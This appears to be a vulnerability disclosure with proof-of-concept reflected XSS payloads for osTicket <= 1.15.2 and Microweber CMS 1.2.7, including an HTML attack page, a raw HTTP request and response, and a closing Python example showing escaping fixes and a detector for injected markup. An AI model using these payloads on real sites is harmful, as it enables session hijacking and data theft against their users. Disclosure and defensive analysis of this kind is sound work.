Reflected XSS on osTicket <= 1.15.2
osTicket Reflected XSS
Vuln Description:
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application into the victim's browser. The script is delivered through a link that sends a request to a vulnerable page, which echoes the script back so that it executes in the victim's browser.
Impact: High
The impact of an exploited XSS vulnerability on a web application varies widely. It ranges from hijacking the user's session to, when combined with a social engineering attack, disclosure of sensitive data.
POC:
Identified unauthenticated reflected XSS on osTicket version <= 1.15.2.
1. An HTML file was created to reproduce the issue. Because the vulnerable request requires a Referer header to be present, the HTML file can be hosted anywhere on a server under our control; clicking the link on that page sends the victim to the target server, as highlighted.
- The XSS payload injected into the `message` parameter executes, as shown in the screenshot.
**HTML Code:**

```html
<!DOCTYPE html>
<html>
<body>
<h2>Reflected XSS</h2>
<p>Host This so that it can create a referer header on click.</p>
<a href="http://127.0.0.1/osTicket-v1.15.2/upload/ajax.php/form/help-topic/2?c65b94947ba69bb4=&message=1%20onmouseover=confirm(document.location)%20">Click Here to XSS</a>
</body>
</html>
```
Microweber CMS (1.2.7) Reflected XSS
Microweber Reflected XSS
Vuln Description:
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application into the victim's browser. The script is delivered through a link that sends a request to a vulnerable page, which echoes the script back so that it executes in the victim's browser.
Impact: High
The impact of an exploited XSS vulnerability on a web application varies widely. It ranges from hijacking the user's session to, when combined with a social engineering attack, disclosure of sensitive data.
POC:
Identified unauthenticated reflected XSS on Microweber CMS version <= 1.2.7.
1. The POST request is modified to insert the XSS payload into the `module` parameter.
- The injected XSS payload is reflected in the response and executes, as shown in the screenshot.
Request:

```http
POST /latest/module/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.10/latest
Cookie: laravel_session=sZd2dncQHiqTHHF4nViZLVDVDEjgSQOk0XiKvxi9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 97
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

_confirm=1&captcha_parent_for_id=footer_newsletter&module='"()&%<ScRiPt>alert(9803)</ScRiPt>
```
Response:

```http
HTTP/1.1 200 OK
Date: Sun, 23 May 2021 18:43:25 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Cache-Control: no-cache, private
Set-Cookie: laravel_session=sZd2dncQHiqTHHF4nViZLVDVDEjgSQOk0XiKvxi9; expires=Sun, 23-May-2021 20:43:26 GMT; Max-Age=7200; path=/; httponly
Content-Length: 128
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

mw_replace_back_this_module_1163675171-parser_modules227517859110<ScRiPt>alert(9803)</ScRiPt>
```
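The two reports above share one root cause in two output contexts: osTicket reflects `message` into an unquoted attribute, so the payload needs no `<` at all, while Microweber reflects `module` straight into the response body. The Python below is an added example, not code from either project, that mirrors both reflections with hypothetical templates, shows that entity-escaping alone does not fix the unquoted-attribute case, and uses the standard-library HTML parser as a defender's check for script elements or event-handler attributes the template never declared.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs: the two payload values from the reports above.
OSTICKET_MESSAGE = "1 onmouseover=confirm(document.location) "
MICROWEBER_MODULE = "'\"()&%<ScRiPt>alert(9803)</ScRiPt>"

# Hypothetical templates that mirror where each value lands in the response.
def render_attr_unquoted_raw(value: str) -> str:
    # Raw value in an unquoted attribute: the osTicket case.
    return f"<input name=message value={value}>"

def render_attr_unquoted_escaped(value: str) -> str:
    # Escaping alone: this value has no <, >, quotes or &, so nothing changes
    # and the space still terminates the attribute, letting onmouseover in.
    return f"<input name=message value={html.escape(value, quote=True)}>"

def render_attr_quoted_escaped(value: str) -> str:
    # Hardened: quote the attribute AND escape quotes, &, < and >.
    return f'<input name="message" value="{html.escape(value, quote=True)}">'

def render_body_raw(value: str) -> str:
    # Raw value in the HTML body: the Microweber case.
    return f"mw_replace_back_this_module_{value}"

def render_body_escaped(value: str) -> str:
    # Hardened: entity-encode before writing into the body.
    return f"mw_replace_back_this_module_{html.escape(value, quote=True)}"

class _MarkupInspector(HTMLParser):
    """Records script tags and on* attributes as the browser's parser sees them."""
    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name}")

def injected_markup(rendered: str) -> list[str]:
    """Defender's check: parse the rendered HTML and report script elements or
    event-handler attributes that the template itself never declared."""
    inspector = _MarkupInspector()
    inspector.feed(rendered)
    inspector.close()
    return inspector.findings
```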